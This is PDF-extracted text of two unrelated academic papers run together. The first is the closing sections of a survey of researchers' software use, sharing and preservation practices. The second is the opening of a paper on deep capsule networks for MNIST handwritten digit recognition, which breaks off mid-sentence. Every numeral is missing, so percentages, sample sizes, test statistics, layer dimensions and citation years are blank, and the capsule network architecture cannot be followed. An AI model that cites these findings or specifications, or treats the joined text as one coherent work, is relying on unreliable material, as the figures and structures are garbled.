. % indicated that everyone in the lab used the same language(s). . use of research software previous scholarship (e.g. borgman et al. ( )) has indicated that researchers use software for a wide variety of purposes. to examine the purposes of research software, we asked participants about how they use their code or software (figure ). this question allowed them to choose multiple answers from a suggested list or input other answers. figure (a) shows that our participants use software primarily to analyze data, visualize data, clean and organize data, automate their work, and collect data. a total of participants ( . % out of participants) responded that they use software for all five. “other” responses included running simulations, building models, researching algorithms, testing methods, writing compilers, and sharing and publishing / yes no i don't know % . . . . . ● ● non−cs cs (a) do you write source code? n = yes no i don't know % . . . . . ● ● non−cs cs (b) do you use source code written by others? n = yes no i don't know % . . . . . ● ● non−cs cs (c) do you create executables? n = yes no i don't know % . . . . . ● ● non−cs cs (d) do you use executables created by others? n = figure . significantly more participants from computer science stated that they write source code, create executables, and use executables created by others than participants from other disciplines. yes no i don't know % . . . . . . open source commercial software figure . the use of open source software versus commercial software. n = . / to analyze data to visualize data to clean/organize data to do automation to collect data other % . . . . . . (a) how do you use code or software? n = yes no i don't know % . . . (b) have you ever repurposed your code or software? n = figure . the purpose of using research software. note that the first question could be answered with more than one choice. data. we also asked if researchers repurpose their code (i.e. using it for a project other than the one for which it was originally created) and found that % out of participants indicated that they do that. we investigated how researchers collaborate on code writing within their research labs (figure ) (e.g. “do you write code collaboratively (i.e. with another person or multiple people)?”, “does everyone in your lab or research group write code using the same programming language(s)?”) we found that . % (n = ) of researchers write code collaboratively (figure (a)), while only % (n = ) use the same coding language in their research labs (figure (b)). previous studies on the reuse of research software have focused mainly on licensing, review of code, and user awareness (joppa et al. ( ); morin et al. ( a)). reinforcing the need to establish best practices (or good enough practices - e.g. wilson et al. ( ) akin to those related to the management of research data, . % of our participants (n = ) indicated that they repurpose their code. in an open response question, we asked participants to describe, in their own words, how they use their software and code. here, again, participants indicated that they use software for a wide variety of purposes. one participant summed the relationship between software and their research succinctly as “i use software for stimulus presentation, data acquisition, and data analysis and visualization - basically my entire research is run via computers (and thus code).” similarly, another participant described the application of software within the field of computer science: “as a computer scientist, almost every aspect of my research from grant proposal to collecting data to analyzing data to writing up my results involves software. i write software. i use software my collaborators or students write as well as open source and commercial software. reproducibility-related practices to understand how the practices of our participants align with those related to computational reproducibil- ity, we asked a number of questions about adding comments to source code, generating documentation, communicating information about dependencies, and using “notebook” applications such as jupyter. we also asked about awareness of coding conventions and best practices. the results of these questions are shown in figure . in line with previous research (hannay et al. ( ); joppa et al. ( ); prabhu et al. ( )), only . % (n = ) of our participants indicated that they have received formal training in coding conventions or best practices. at the same time, we found that many actually employ practices that are commonly cited for establishing computational reproducibility. for example, when asked “do you include comments in your code?” and “when you share your code or software, do you provide information about dependencies?” the majority of participants ( . %, n = , . %, n = ) indicated that they include comments and provide information about dependencies, respectively. however, substantially / yes no i don't know % . . (a) does everyone in your lab or research group write code using the same programming language(s)? n = yes no i don't know % . . . (b) do you write code collaboratively? n = figure . consistency of programming languages within research groups. yes no % . . . . ● ● non−cs cs (a) have you received training in coding conventions or best practices? n = . yes no i don't know % . . . . . ● ● non−cs cs (b) do you include comments in your code? n = . yes no i don't know % . . . . . . ● ● non−cs cs (c) do you generate documentation for your code? n = . yes no i don't know % . . . . . ● ● non−cs cs (d) do you write code using a notebook? n = . figure . reproducibility practices in research. / yes no i don't know % . . . . ● ● non−cs cs (a) when you share your code or software, do you share it alongside related files (e.g. datasets)? n = . yes no i don't know % . . . ● ● non−cs cs (b) when you share your code or software, do you provide information about dependencies? n = . figure . cs researchers tend to provide information about dependencies more than other disciplines. fewer indicated that they employ other practices such as generating documentation ( . %, n = ). while electronic lab notebooks have been cited as a tool for ensuring reproducibility (kluyver et al. ( )), only . % (n = ) of our participants indicated that they use them to write code. comparisons of responses by discipline (e.g. computer science versus others) or location (e.g. uc berkeley versus others) were insignificant even, surprisingly, on questions related to training [discipline: χ ( ,n = ) = . , p = . , location: χ ( ,n = ) = . , p = . ] (figure ). the lone exception was in providing information about dependencies. significantly more respondents from computer science reported that they include information about dependencies when they share their code than participants from other disciplines [χ ( ,n = ) = . , p < . ]. sharing and preservation of the research software making materials available for others to evaluate, use, and build upon is an essential component of ensuring reproducibility. much of the previous work examining the sharing of research software has focused on the degree to which software is cited and described irregularly in the scholarly literature (howison and bullard ( a); smith et al. ( )) and the relationship between code sharing and research impact (vandewalle ( )). in order to gain a greater understanding of how sharing practices relate to reproducibility, we asked our participants a variety of questions about how they share, find, and preserve software. . sharing research software sharing practices while only half ( . %, n = ) of our participants indicated that they were aware of related community standards in their field or discipline, the majority indicated that they share software as part of the research process (computer science: . %, other disciplines: . % for n = ) (figure ). of participants, % indicated that there were reasons their software could not be shared (figure (b)). the most commonly cited restrictions on sharing were the inclusion of sensitive data, intellectual property concerns, and the time needed to prepare code for sharing. comparisons between computer science and other disciplines on the sharing of code were not statistically significant [χ ( ,n = ) = . , p > . ]. we also checked if participants share new versions of their code and found that % (n = ) do so using a version control system. a group comparison related to the sharing of new versions was not statistically significant [cs vs non-cs: χ ( ,n = ) = . , p > . ] (figure (c)), however significantly more participants from computer science indicated that they share their codes via a version control system than those from other disciplines [χ ( ,n = ) = . , p < . ] (figure (d)). / yes no i don't know % . . . . . ● ● non−cs cs (a) do you share the code or software created as part of your research? n = . yes no i don't know % . . . . . . ● ● non−cs cs (b) is there any reason your code or software could not be shared? n = . yes no i don't know % . . . . . . ● ● non−cs cs (c) if you make a change to your code, do you share a new version? n = . yes no i don't know % . . . . . ● ● non−cs cs (d) do you use a version control system (e.g. git, svn)? n = . figure . practices of code sharing. / directly via e−mail in a scholarly publication through posts on my website/lab website through social media in a software or data paper through online communities other % . . . . . . . (a) how do you tell people about the code or software you’ve shared? n = . source code executable code both . . . (b) in what format do you typically share your code? n = . figure . methods and formats for sharing software. note that both of these questions could be answered with more than one response. sharing format and platform we asked our participants about how they share their code and found that . % of participants share their software in the form of source code, . % share executables only, and . % share both formats (figure ). as shown in figure (a), participants indicated that they share their software through a variety of channels, with the most common being e-mail. the figure shows that . % of the time our participants make their code available through direct communication and % make their code available through social media platforms. the participants who indicated that they use methods other than those listed in our survey generally responded that they do so using platforms such github or the open science framework. a few researchers mentioned that they save their code along with the dataset in their institutional repository, while others indicated that they publicize their code via conferences. . preserving research software we asked variety of questions about preserving research software (i.e. do you take any steps to ensure that your code or software is preserved over the long term?, how long do you typically save your code or software?, and where do you save your code or software so that it is preserved over the long term?). while research software is a building block for ensuring the reproducibility, . % of participants (n = ) do not prepare their code for long-term preservation. how long do you typically save your code or software? figure (a) shows that the majority of our participants ( . % out of ) preserve their code for more than eight years, but generally not in a way that maintains its use. in contrast, . % (n = ) of participants keep their codes until it is described in a publication, poster, or presentation. we found . % out of researchers tend to keep their codes years or less and . % tend to keep their codes - year. only . % out of researchers tend to keep their codes for years or more with maintaining their codes for future access and use. where do you save your code or software so that it is preserved over the long term? in terms of where our participants preserve their code, figure (b) shows that . % of the time participants use code hosting sites such as github. about . % of the time, researchers use hard drives or external storage to preserve their codes and . % of the time they preserve their codes by putting them on the cloud. only . % of our participants indicated that they use archival repositories (e.g. figshare). the participants who entered “other” responses mentioned that they use a backup system of their lab, organization archive (e.g., university server), their own pc, language package registry (cran, pypi or similar), internal svn repository, or project specific websites. / more than years without maintaining more than years and maintained − years − years until it is described in a publication % . . . . (a) how long do you typically save your code or software? n = . on a code hosting site on a hard drive/external storage in the cloud on my website in an archival repository other in a discipline specific index or registry % . . . . . . . (b) where do you save your code or software so that it is preserved over the long term? n = . figure . . % of researchers use github for preserving their codes. note that the second question could be answered with more than one choice. we asked participants to define sharing and preserving in their own words. their responses generally indicated that they make a distinction between the two concepts. for example, one participant stated succinctly, “sharing is making code available to others, in a readily usable form. preserving is ensuring to the extent practical that the code will be usable as far into the future as possible.” however, several responses indicated that participants did not necessarily regard preservation as an active process that continues even after the conclusion of a particular project (e.g. “sharing means giving access to my code to someone else. preserving means placing my code somewhere where it can remain and i will not delete it to save room or lose it when i switch computers or suffer a hard drive failure.”. in contrast, other responses indicated that participants were aware that preservation is important for reuse purpose and had a knowledge of preservation tools. for example, one researcher defined preserving software as, “branching so that code remains compatible with different versions of overarching libraries (in my case) or with new coding standards and compilers”. and another stated “preserving should be done via a system like lockss that ensures that provides for redundancy. sharing can be done via the web, but must include a license so that recipients know about their rights.” discussion scholars throughout the humanities and sciences depend on software for a wide variety of purposes, including the collection, analysis, and visualization of data (borgman et al. ( ); hey et al. ( )). though ubiquitous, software presents significant challenges to efforts aimed at ensuring reproducibility. our results demonstrate that researchers not only create and use software in a wide variety of forms and for a wide variety of purposes, but also that their software-related practices are often not completely in line with those associated with reproducibility. in particular, our results demonstrate that, while scholars often save their software for long periods of time, many do not actively preserve or maintain it. this perspective is perhaps best encapsulated by one of our participants who, when completing our open response question about the definition of sharing and preserving software, wrote “sharing means making it publicly available on github. preserving means leaving it on github”. we share this anecdote not to criticize our participants or their practices, but to illustrate the outstanding need for support services related to software. in the broader scholarly communications space, there are several prominent frameworks that relate to the reproducibility of scholarly outputs. as part of an effort to advance data as a “first class” research product, the fair (findable, accessible, interoperable, and reusable) guidelines provide a measurable set of principles related to the management and sharing of research data (wilkinson et al. ( )). / the fair principles are general enough that they can, with some modification, also be applied to software (jimenez et al. ( )). at the level of scholarly publications, the top (transparency and openness promotion) guidelines (nosek et al. ( )) addresses citation standards and the availability of research materials including data and software. a supplement to top, the reproducibility enhancement principles (rep) (stodden et al. ( )) specifically targets disclosure issues related to computation and software. however, our results support previous work indicating that software still mostly exists outside the reputation economy of science (howison and herbsleb ( )) which indicates that a more education-based approach, that provides guidance about software before the publication stage is necessary. the majority of our participants indicated that view code or software as “first class” research product, that should be assessed, valued, and shared in the same way as a journal article. however, our results also indicate that there remains a significant gap between this perception and actual practice. the fact that our participants indicated that they create and use software in a wide variety of forms and for a wide variety of purposes demonstrates the significant technical challenges inherent in ensuring computational reproducibility. in contrast, the lack of active preservation and tendency to share software outside traditional (and measurable) scholarly communications channels displayed by our sample demonstrates the social and behavioral challenges. a significant difficulty in ensuring computational reproducibility is that researchers oftentimes do not treat their software as a “first class” research product. these findings reinforce the need for programs to train researchers on how to maintain their code in the active phase of their research. at present, there are a number of initiatives focused on addressing the preservation and reproducibility of software. in the united states, the software preservation network (spn) (meyerson et al. ( )) represents an effort to coordinate efforts to ensure the long-term access to software. the focus of spn is generally on cultural heritage software rather than research software, but their work delineating issues related to metadata, governance, and technical infrastructure has substantial overlap with what is required for research software. in the united kingdom, the software sustainability institute trains researchers on how to develop better software and make better use of the supporting infrastructure (crouch et al. ( )). befitting the necessity of training and preservation indicated by our study, a similar effort, the us software sustainability initiative was recently awarded funding by the national science foundation (nsf award # ). while it is likely not possible for academic institutions to offer support services that cover the broad range of programming languages and applications described in our survey results, collaborating with such groups to create guidance and best practice recommendations may a feasible first step in engaging with researchers about their software and code in the same manner as many research data management (rdm) initiatives now engage with them about their data. while research stakeholders including academic institutions, publishers, and funders have an interest in tackling issues of computational reproducibility in order to ensure the integrity of the research process, our results demonstrate the complexity of doing so. one participant summed up why their code could not be made re-usable: “most of my coding is project specific and not reusable between projects because the datasets i encounter are very variable. i typically only generate packages for tasks such as getting data from a database (e.g., pubmed) and keeping rmarkdown templates in an orderly way.” conclusion and future work in this paper, we introduced the results of surveying researchers across different institution on software usage, sharing, and preservation. we also checked the practices used to manage software for ensuring the reproducibility and integrity of the scientific research. our results point to several interesting trends including the widespread writing of source code and use of source code written by others, the variety of programming languages used and the lack of consistency even within the same lab or research group, the use of open source software over commercial software, and the adoption of some practices assure computational reproducibility, such as adding comments and documentation to code, but not others, specifically the general lack of active preservation. the findings of this paper inform ongoing conversations about research software and reproducibility on the current practices around research software. this will help service providers to deliver the right tools and systems that help researchers to manage their code and help in ensuring the integrity of the reproducibility in the scholarly ecosystem. the present study was designed to capture a broad picture of how researchers use and share their software. for this reason, we were not able to provide a particularly granular picture of how individual practices relate to reproducible science outcomes. for example, while the majority of our participants / responded that they include comments in their source code and generate documentation for their software, we were not able to make any judgment about whether or not the contents of these comments and documentation are sufficient to ensure reproducibility. follow up research is needed in order to gain a more nuanced understanding of how processes related to the creation and use of research software relate to reproducibility. however, despite these limitations, our results indicate several potential directions for future library services centered on helping researchers create, use, and share their software and assure computational reproducibility. acknowledgments we would like to thank our colleagues at uc berkeley library and california digital library for their valuable suggestions and insightful comments throughout this project. references alnoamany, y. and borghi, j. a. ( a). data: researcher perspectives on the use and sharing of software. alnoamany, y. and borghi, j. a. ( b). software study code. barnes, n. ( ). publish your computer code: it is good enough. nature, ( ): – . boettiger, c. ( ). an introduction to docker for reproducible research. acm sigops operating systems review, ( ): – . borgman, c. l., wallis, j. c., and mayernik, m. s. ( ). who’s got the data? interdependencies in science and technology collaborations. computer supported cooperative work (cscw), ( ): – . chirigati, f., shasha, d., and freire, j. ( ). reprozip: using provenance to support computational reproducibility. in proceedings of the th usenix workshop on the theory and practice of provenance, tapp ’ , pages – . usenix association. crouch, s., hong, n. c., hettrick, s., jackson, m., pawlik, a., sufi, s., carr, l., roure, d. d., goble, c., and parsons, m. ( ). the software sustainability institute: changing research software attitudes and practices. computing in science & engineering, ( ): – . eglen, s. j., marwick, b., halchenko, y. o., hanke, m., sufi, s., gleeson, p., silver, r. a., davison, a. p., lanyon, l., abrams, m., wachtler, t., willshaw, d. j., pouzat, c., and poline, j.-b. ( ). toward standard practices for sharing computer code and programs in neuroscience. nature neuroscience, : . fecher, b., friesike, s., and hebing, m. ( ). what drives academic data sharing? plos one, ( ): – . goble, c. ( ). better software, better research. ieee internet computing, ( ): – . goodman, s. n., fanelli, d., and ioannidis, j. p. a. ( ). what does research reproducibility mean? science translational medicine, ( ): ps – ps . hafer, l. and kirkpatrick, a. e. ( ). assessing open source software as a scholarly contribution. communications of the acm, ( ): – . hannay, j. e., macleod, c., singer, j., langtangen, h. p., pfahl, d., and wilson, g. ( ). how do scientists develop and use scientific software? in proceedings of the icse workshop on software engineering for computational science and engineering, secse ’ , pages – . ieee computer society. hey, t., tansley, s., and tolle, k. ( ). the fourth paradigm: data-intensive scientific discovery. microsoft research. hong, n. c. ( ). digital preservation and curation: the danger of overlooking software. the preservation of complex objects, page . hong, n. c. ( ). dealing with software: the research data issues. howison, j. and bullard, j. ( a). how is software visible in the scientific literature. technical report, technical report, univ. of texas. howison, j. and bullard, j. ( b). software in the scientific literature: problems with seeing, finding, and using software mentioned in the biology literature. journal of the association for information science and technology. howison, j. and herbsleb, j. d. ( ). scientific software production: incentives and collaboration. / in proceedings of the acm conference on computer supported cooperative work, cscw ’ , pages – . acm. howison, j. and herbsleb, j. d. ( ). incentives and integration in scientific software production. in proceedings of the acm conference on computer supported cooperative work, cscw ’ , pages – . acm. hucka, m. and graham, m. j. ( ). software search is not a science, even among scientists. corr, abs/ . . inc., s. e. ( ). developer survey results . ince, d. c., hatton, l., and graham-cumming, j. ( ). the case for open computer programs. nature, : . jimenez, r., kuzak, m., alhamdoosh, m., barker, m., batut, b., borg, m., capella-gutierrez, s., chue hong, n., cook, m., corpas, m., flannery, m., garcia, l., gelpì, j., gladman, s., goble, c., gonz·lez ferreiro, m., gonzalez-beltran, a., griffin, p., gr¸ning, b., hagberg, j., holub, p., hooft, r., ison, j., katz, d., leskoek, b., lupez gumez, f., oliveira, l., mellor, d., mosbergen, r., mulder, n., perez-riverol, y., pergl, r., pichler, h., pope, b., sanz, f., schneider, m., stodden, v., suchecki, r., svobodov· va?ekov·, r., talvik, h., todorov, i., treloar, a., tyagi, s., van gompel, m., vaughan, d., via, a., wang, x., watson-haigh, n., and crouch, s. ( ). four simple recommendations to encourage best practices in research software [version ; referees: approved]. f research, ( ). joppa, l. n., mcinerny, g., harper, r., salido, l., takeda, k., o’hara, k., gavaghan, d., and emmott, s. ( ). troubling trends in scientific software use. science, ( ): – . katz, d. s., allen, g., hong, n. c., parashar, m., and proctor, d. ( ). first workshop on sustainable software for science: practice and experiences (wssspe): submission and peer-review process, and results. arxiv preprint arxiv: . . kim, y. and stanton, j. m. ( ). institutional and individual factors affecting scientists’ data-sharing behaviors: a multilevel analysis. journal of the association for information science and technology, ( ): – . kissel, r., kissel, r., blank, r., and secretary, a. ( ). glossary of key information security terms. in nist interagency reports nist ir revision , national institute of standards and technology. kluyver, t., ragan-kelley, b., pérez, f., granger, b., bussonnier, m., frederic, j., kelley, k., hamrick, j., grout, j., corlay, s., ivanov, p., avila, d., abdalla, s., willing, c., and development team [unknown], j. ( ). jupyter notebooks: a publishing format for reproducible computational workflows. in loizides, f. and scmidt, b., editors, positioning and power in academic publishing: players, agents and agendas, pages – . ios press. kratz, j. e. and strasser, c. ( ). researcher perspectives on publication and peer review of data. plos one, ( ): – . marwick, b. ( ). computational reproducibility in archaeological research: basic principles and a case study of their implementation. journal of archaeological method and theory, ( ): – . mccarthy, d. j., humburg, p., kanapin, a., rivas, m. a., gaulton, k., cazier, j.-b., and donnelly, p. ( ). choice of transcripts and software has a large effect on variant annotation. genome medicine, ( ): . meyerson, j., vowell, z., hagenmaier, w., leventhal, a., roke, e. r., rios, f., and walsh, t. ( ). the software preservation network (spn): a community effort to ensure long term access to digital cultural heritage. d-lib magazine, ( / ). monteith, j. y., mcgregor, j. d., and ingram, j. e. ( ). scientific research software ecosystems. in proceedings of the european conference on software architecture workshops, ecsaw ’ , pages : – : . acm. morin, a., urban, j., adams, p. d., foster, i., sali, a., baker, d., and sliz, p. ( a). shining light into black boxes. science, ( ): – . morin, a., urban, j., and sliz, p. ( b). a quick guide to software licensing for the scientist-programmer. plos computational biology, ( ): – . munafò, m. r., nosek, b. a., bishop, d. v. m., button, k. s., chambers, c. d., percie du sert, n., simonsohn, u., wagenmakers, e.-j., ware, j. j., and ioannidis, j. p. a. ( ). a manifesto for reproducible science. nature human behaviour, ( ): . nih ( ). strategies for nih data management, sharing, and citation. / nosek, b. a., alter, g., banks, g. c., borsboom, d., bowman, s. d., breckler, s. j., buck, s., chambers, c. d., chin, g., christensen, g., contestabile, m., dafoe, a., eich, e., freese, j., glennerster, r., goroff, d., green, d. p., hesse, b., humphreys, m., ishiyama, j., karlan, d., kraut, a., lupia, a., mabry, p., madon, t., malhotra, n., mayo-wilson, e., mcnutt, m., miguel, e., paluck, e. l., simonsohn, u., soderberg, c., spellman, b. a., turitto, j., vandenbos, g., vazire, s., wagenmakers, e. j., wilson, r., and yarkoni, t. ( ). promoting an open research culture. science, ( ): – . nosek, b. a., spies, j. r., and motyl, m. ( ). scientific utopia: ii. restructuring incentives and practices to promote truth over publishability. perspectives on psychological science, ( ): – . pan, x., yan, e., and hua, w. ( ). disciplinary differences of software use and impact in scientific literature. scientometrics, ( ): – . perez, f. and granger, b. e. ( ). ipython: a system for interactive scientific computing. computing in science engineering, ( ): – . piccolo, s. r. and frampton, m. b. ( ). tools and techniques for computational reproducibility. gigascience, ( ): . prabhu, p., jablin, t. b., raman, a., zhang, y., huang, j., kim, h., johnson, n. p., liu, f., ghosh, s., beard, s., oh, t., zoufaly, m., walker, d., and august, d. i. ( ). a survey of the practice of computational science. in state of the practice reports, sc ’ , pages : – : . acm. prlić, a. and procter, j. b. ( ). ten simple rules for the open development of scientific software. plos comput biol, ( ):e . ram, k., katz, d., carver, j., gesing, s., and weber, n. ( ). si -s i conceptualization: conceptual- izing a us research software sustainability institute (urssi). rios, f. ( ). the pathways of research software preservation: an educational and planning resource for service development. d-lib magazine, ( / ). sadowski, c., stolee, k. t., and elbaum, s. ( ). how developers search for code: a case study. in proceedings of the th joint meeting on foundations of software engineering, pages – . acm. sandve, g. k., nekrutenko, a., taylor, j., and hovig, e. ( ). ten simple rules for reproducible computational research. plos computational biology, ( ): – . smith, a. m., katz, d. s., and niemeyer, k. e. a. ( ). software citation principles. peerj computer science, :e . stodden, v. ( ). the legal framework for reproducible scientific research: licensing and copyright. computing in science & engineering, ( ): – . stodden, v., guo, p., and ma, z. ( ). toward reproducible computational research: an empirical analysis of data and code policy adoption by journals. plos one, ( ): – . stodden, v., leisch, f., and peng, r. d. ( ). implementing reproducible research. crc press. stodden, v., mcnutt, m., bailey, d. h., deelman, e., gil, y., hanson, b., heroux, m. a., ioannidis, j. p., and taufer, m. ( ). enhancing reproducibility for computational methods. science, ( ): – . teal, t. k., cranston, k. a., lapp, h., white, e., wilson, g., ram, k., and pawlik, a. ( ). data carpentry: workshops to increase data literacy for researchers. international journal of digital curation, ( ): – . tenopir, c., allard, s., douglass, k., aydinoglu, a. u., wu, l., read, e., manoff, m., and frame, m. ( ). data sharing by scientists: practices and perceptions. plos one, ( ):e . tenopir, c., dalton, e. d., allard, s., frame, m., pjesivac, i., birch, b., pollock, d., and dorsett, k. ( ). changes in data sharing and data reuse practices and perceptions among scientists worldwide. plos one, ( ): – . thain, d., ivie, p., and meng, h. ( ). techniques for preserving scientific software executions: preserve the mess or encourage cleanliness? proceedings of the th international conference on digital preservation (ipres). vandewalle, p. ( ). code sharing is associated with research impact in image processing. computing in science engineering, ( ): – . wellcome ( ). policy on data, software and materials management and sharing. wilkinson, m. d., dumontier, m., aalbersberg, i. j., appleton, g., axton, m., baak, a., blomberg, n., boiten, j.-w., da silva santos, l. b., bourne, p. e., bouwman, j., brookes, a. j., clark, t., crosas, / m., dillo, i., dumon, o., edmunds, s., evelo, c. t., finkers, r., gonzalez-beltran, a., gray, a. j. g., groth, p., goble, c., grethe, j. s., heringa, j., ’t hoen, p. a. c., hooft, r., kuhn, t., kok, r., kok, j., lusher, s. j., martone, m. e., mons, a., packer, a. l., persson, b., rocca-serra, p., roos, m., van schaik, r., sansone, s.-a., schultes, e., sengstag, t., slater, t., strawn, g., swertz, m. a., thompson, m., van der lei, j., van mulligen, e., velterop, j., waagmeester, a., wittenburg, p., wolstencroft, k., zhao, j., and mons, b. ( ). the fair guiding principles for scientific data management and stewardship. scientific data, : . wilson, g. ( ). software carpentry: getting scientists to write better code by making them more productive. computing in science & engineering, ( ): – . wilson, g., bryan, j., cranston, k., kitzes, j., nederbragt, l., and teal, t. k. ( ). good enough practices in scientific computing. plos computational biology, ( ): – . / paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - deep capsule network handwritten digit recognition yuxing tan school of computer science and engineering xi'an technological university xi'an, china e-mail: yuxing_tan@foxmail.com hongge yao school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—aiming at the weakness of cnn that is not sensitive to the changes of relative position and angle, a method of digital handwritten recognition based on deep capsule network is researched. the capsule network represents multiple attributes of an entity through a group of capsules composed of neurons, which effectively preserves the information about the position and posture of the entity. dynamic routing algorithm makes the information interaction between capsules more clearly, and can determine the pose of the entity more accurately. while solving the shortcomings of convolutional neural networks, it also integrates the advantages of cnn and considers the relative position of it’s lack, so that the recognition effect is improved. the design implements a deep capsule network, reduces the amount of trainable parameters by changing the size of the convolution kernel, expands on the original network structure, adds a convolution after the convolution layer, and a process of dynamic routing on the main dynamic routing is added, and the number of iterations is changed for experimentation, which makes the accuracy of network recognition higher on the mnist data set. keywords-component; deeplearning; nerve capsule; deep capsule network; handwritten digit recognition i. introduction in our daily life, handwritten numbers are very common, but in many areas of work, the part about numbers is sometimes very cumbersome, such as data collection, which is a time-consuming, large amount of work. at this time, the function of handwriting recognition technology is reflected, which brings convenience and efficiency to human. the proposal of nerve capsule comes from a assumption of hinton[ ]: instead of using a group of coarse coding or single neurons to represent the relationship between the observer and the object similar to the object's posture information, a set of activated neurons is selected to represent it. this group of neurons is called nerve capsule. one of the advantages of capsule network is that it needs less training data than convolutional neural network, but the effect is not inferior to it. for the traditional neural network, neurons can not represent multiple attributes at the same time, resulting in the activation of neurons can only represent a certain entity. in this way, the nature of the entity will be hidden in a large number of network parameters. when adjusting the network parameters, we can not guarantee the pure motivation. it must take into account the input of all kinds of samples, so it is inevitable to adjust the parameters in a troublesome and time-consuming manner. after the application of vector neurons, we will be able to determine the existence of all the properties wrapped in a capsule, in the adjustment of parameters, such constraints will be greatly reduced, the best parameters are easy to obtain. the design and research of artificial neural network largely borrows from the structure of biological neural network. in the field of neurolysis, a conclusion has been drawn that there are a large number of cortical dominant structures in the cerebral cortex of most primates. there are hundreds of neurons in the cortex of most primates, and there are also hierarchical structures in it. these small units can handle different types of visual stimuli well. the researchers speculate that there is a mechanism in the brain that combines low-level visual features with some weight values to construct a colorful world in our eyes. based on this discovery in biology, hinton suggests that it is more appropriate to try to replace the relationship between the object and the observer with a series of active neurons instead of one. so, there is the nerve capsule mentioned earlier. international journal of advanced network, monitoring and controls volume , no. , in october , sabour, hinton and others published the topic "dynamic routing between capsules "[ ] at a top-level conference on machine learning called "nips" and proposed capsule network (capsnet). this is a deep learning method that shakes the whole field of artificial intelligence. it breaks the bottleneck of convolutional neural network (cnn) and pushes the field of artificial intelligence to a new level. this paper focuses on the recognition of mnist data set based on capsule network. mnist[ ] is a data set composed of numbers handwritten by different people. although handwritten digits in bp neural network[ ] and convolution neural network[ ][ ][ ][ ] have a certain good recognition effect, but the emergence of capsule network brings a new breakthrough to the recognition of data sets, and has a better recognition effect, and it’s recognition accuracy greatly exceeds the convolutional neural network. ii. related work the neural capsule proposed by hinton is to implement ontology from the perspective of philosophy. the various properties of a particular entity are represented by the activity of nerve cells in an activated capsule. these attributes include the size, location, orientation and other information of the entity. from the existence of some special attributes, we can infer the existence of instances. in the field of machine learning, the probability of entity existence is represented by the output size of independent logistic regression unit. in the neural capsule, the norm obtained by normalizing the output high-order vector represents the existence probability of the entity, and the attributes of the entity are represented by various "posture" of the vector. this reflects the essence of ontology, that is to define the existence of entity according to its various attributes. in the research of capsule network, the working process of capsule network is closer to the behavior of human brain because of its less training data. in the aspect of white box adversarial attacks, capsule network shows strong resistance. under the effect of the fast gradient symbol method, the accuracy can still be maintained above %. the accuracy of training and testing on mnist is better than that of convolution neural network. in some practical applications, such as in specific text classification tasks, convolution capsule network can effectively improve the accuracy of feature extraction. [ ]chinese scholars have also applied the visual reconstruction method based on capsule network structure in the field of functional magnetic resonance imaging. in the intelligent traffic sign recognition, by introducing pooling layer into the main capsule layer, the super depth convolution model improves the feature extraction part of the original network structure, and uses the moving index average method to improve the dynamic routing algorithm, which improves the recognition accuracy of the network in the field of traffic sign recognition. the capsule network first appeared in the article "dynamic routing between capsules" published by hinton et al. in october . based on the capsule network proposed by sabour et al in , an improved version of the new capsule system was proposed in the article "matrix capsules with em routing"[ ] published in . in this system, each encapsulated capsule uses a logical unit to represent the presence or absence of an entity. a × pose matrix is used to represent the pose information of the entity. in this paper, the iterative routing method between capsule layers based on em algorithm is mentioned. the output of the lower layer capsules reaches the higher level capsules through routing algorithm, so that the activated capsules get a group of similar pose voting. the new system is much more resistant to lily attacks than baseline cnn. in the paper "stacked capsule autoencoders"[ ] published in , an unsupervised capsule automatic encoder (scae) is introduced. by observing the neural encoders of all components, the existence and pose information of the target can be inferred, that is to say, the object can be inferred explicitly through the relationship between the components. the accuracy on svhn[ ] and mnist datasets is % and . %, respectively. iii. deep capsule network a. structure of deep capsule network ) encoder structure of deep capsule network figure . network structure of deep capsule conv : standard convolution. it is dedicated to extract some low-level feature information from the input image. the preprocessing data layer of capsnet is to convert the brightness of pixels in the input layer into local feature output. the input image of this layer is × , with convolution kernels with step size of and size of × . after convolution, the output is a international journal of advanced network, monitoring and controls volume , no. , three-dimensional array. by reshaping the array, the appropriate feature vector of position information is constructed for each dimension. the final output is a tensor of × × . conv : standard convolution layer, including convolution cores with step size of and size of × , input tensor of × × and output of tensor of × × . primary capsule: primary capsule layer, also known as the primary capsule layer, is in a low-level stage, multidimensional entities are described in capsnet from the perspective of "inverse graph". it is a reverse rendering process, that is, this layer can combine the low-level features detected by the previous layer. this layer is still committed to extracting feature information, so it still belongs to convolution layer. the object of convolution is changed from single neuron to capsule with larger granularity, which is the difference between convolution network and convolution network. the primary capsule layer is the convolution layer of "capsule version". this stage is also where the capsule really begins. this layer consists of main capsules, each of which contains convolution kernels of × × with step size of . according to the above, the tensor of × × × is obtained by inputting × × tensors in this layer. digitcaps: digital capsule layer, also the full connection layer of capsule network. using a fully connected topology, the capsules in this layer will connect all outputs of the previous primary capsule layer. because this paper finally realizes the recognition of - , so there are capsules in this layer. the norm of each activation vector represents the probability of each classification and is used to calculate the classification loss. the input received by this layer is the tensor of × × × of the output of the previous layer, and the output is a matrix of × . finally, the capsule network is compared with the improved deep capsule network as shown in the following table : ) decoder structure the decoder structure in this paper is the same as capsnet, as shown in the figure. the goal of capsnet model optimization is to calculate the edge loss for each number to allow multiple numbers to exist at the same time. in addition, capsnet can reconstruct the input image based on the instantiation parameters obtained by previous processing. in the training process of image reconstruction, only the activated capsules are allowed to participate in the adjustment of three-level fully connected network at each time. the structure mainly responsible for reconstructing the image is the decoder, which receives a × matrix from the digital capsule layer, reconstructs a × image after three full connection layers. table i. structure comparison of capsule network and deep capsule network capsule network deep capsule network convolution layer conv : * * conv : * * conv : * * primary capsule * * digit capsule one time dynamic routing three iterations twice dynamic routing the main route has three iterations, and the secondary route has three iterations fc figure . decoder network b. working mechanism of dynamic routing in this paper, there are two routes, the primary route and the secondary route, but both are the same dynamic path structure. it is used to ensure that the output of the capsule is only delivered to the appropriate parent node, which is similar to the idea of "focusing on cultivation". it is necessary for the lower layer capsule i to know how to deliver its output vector to the higher- level capsule j. at this time, it is necessary to evaluate the coupling degree between the low-level capsules and the high-level capsules. this is represented by the scalar weight cij, which is the importance. in this high-dimensional vector space, in order to describe the spatial relationship of different parts of the entity, each capsule is set with corresponding weight. an affine transformation matrix, which is composed of several weight vectors, an affine transformation matrix is generated. after transforming the matrix, we can get the j prediction vector �̂�j|i of each low-level capsule i to a high-level capsule. on the level of possible international journal of advanced network, monitoring and controls volume , no. , advanced capsules, the prediction vector �̂�j|i=wijui is obtained by multiplying the weight matrix wij with the output ui of low-level 